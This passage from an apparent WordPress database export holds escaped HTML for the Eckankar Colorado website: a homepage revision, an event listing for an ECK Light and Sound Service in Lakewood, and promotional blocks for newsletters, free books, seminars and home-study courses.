class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269403\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269404\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269405\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Home','','inherit','closed','closed','','7160-revision-v1','','','2023-11-20 13:33:00','2023-11-20 20:33:00','',7160,'https://eckankar-colorado.org/?p=269408',0,'revision','',0),(269412,15,'2023-11-21 09:40:16','2023-11-21 16:40:16','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 18pt; color: #cf7119;\">How Can I Listen to Divine Guidance?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Discover the secrets of tapping into divine wisdom to get the help you need in your daily life.</strong></span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Do you want to connect to the Divine within you?</strong></span></p>\r\n</li>\r\n	<li>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Do you need help understanding what your nudges are telling you?</strong></span></p>\r\n</li>\r\n	<li>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Are you ready to step into a larger room spiritually?</strong></span></p>\r\n</li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, then this ECK Light &amp; Sound Service is for you.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">“Sometimes the Holy Spirit may work in a gentle way. It may give you just a nudge, a feeling of how to act, what to do.” Harold Klemp,&nbsp;<em>Love the Keystone of Life</em>, p. 77</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><em><strong>The ECK Light &amp; Sound Service will be held in person at the ECK Temple of Colorado, 7100 West Mississippi Avenue in Lakewood Colorado and will be broadcast live simultaneously on Zoom.</strong></em>&nbsp;<strong>Please RSVP to get the Zoom link</strong>.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU Chant, and be able to speak with other like-hearted spiritual seekers. It is an uplifting event where you can reflect on and connect with the Light and Sound, the divine aspect within yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The ECK Light and Sound Service is followed by light refreshments and the opportunity to share informally.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Join others seeking to bring more insight and divine love into their lives at this special celebration of the Light and Sound of God.</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">Discover spiritual tools to meet life’s challenges</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Awaken to the divine guidance always within you</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Open your heart to give and receive more divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Experience how the Light and Sound of God can help you lead a happier life</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are invited to come and experience spiritual growth and fellowship as you explore what could be your next spiritual step.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by&nbsp;<a class=\"!text-viridian\" href=\"http://www.eckankar-colorado.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Eckankar </a>as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','How Can I Listen to Divine Guidance?','','publish','closed','closed','','how-can-i-listen-to-divine-guidance','','','2023-11-21 09:40:16','2023-11-21 16:40:16','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=269412',0,'mec-events','',0),(269413,2,'2023-11-21 09:31:13','2023-11-21 16:31:13','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px; padding-bottom: 29px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p class=\"mod-reset\"><img class=\"alignnone wp-image-269414 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.45) 0px 25px 20px -20px; margin-top: 9px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg\" alt=\"\" width=\"801\" height=\"445\"></p>\r\n<p class=\"\" style=\"font-style: normal; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; text-align: center; color: #cd8a0e;\" data-font-style=\"normal\" data-font-weight=\"600\" data-font-family=\"Open Sans\">New to ECK? Guests register free!</p>\r\n<p class=\"\" style=\"text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get More Information and Register Now!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-6\" style=\"padding-right: 0em; padding-left: 2em;\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: 5px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Now streaming through January 31, 2024</h2>\r\n<p class=\"\" style=\"font-size: 21px; font-family: \'Open Sans\'; font-weight: bold; color: #697085; line-height: 26px;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hear Sri Harold, the Mahanta, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured Events Include:</p>\r\n<ul class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li>Keynote talk, by Sri Harold Klemp, the spiritual leader of ECKANKAR;</li>\r\n	<li>All main-stage talks and performances; and</li>\r\n	<li>The 2023 digital Spiritual Art Gallery.</li>\r\n	<li>NEW ECKANKAR Soul Adventure Podcast—Animals Are Souls Too</li>\r\n	<li>ECK Soul Adventure Magazine—How Do We Soul Travel?</li>\r\n</ul>\r\n<p class=\"\" style=\"text-align: left; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Take your next spiritual step today.<br>\r\nYour life can truly be a Soul Adventure!</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all 